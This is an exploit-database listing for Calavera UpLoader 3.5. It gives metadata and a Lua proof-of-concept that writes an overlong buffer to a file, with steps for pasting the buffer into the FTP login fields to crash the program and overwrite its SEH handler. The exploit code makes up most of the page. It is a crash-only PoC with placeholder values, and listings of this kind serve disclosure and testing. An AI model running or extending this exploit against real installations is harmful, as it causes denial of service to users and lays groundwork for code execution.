Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-264 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2021-01-04 |
CPE |
---|
cpe:cpe:/a:calavera:uploader:3.5.039 |
-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite). -- Courtesy of Rmulo, @uromulou - Date : 04/01/2021. -- PoC < Proof of Concept: -- -- 1 -> Run the lua script, to create file "poc.dat"... -- 2 -> Copy the content of the new file "poc.dat" to clipboard... -- 3 -> Open the application... -- 4 -> Click on "Settings"... -- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"... -- 6 -> Down... -- print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)") print("-> This exploit was written by Rmulo, @uromulou.") local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000) file = io.open("poc.dat", "w") file:write(buffer) file:close()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.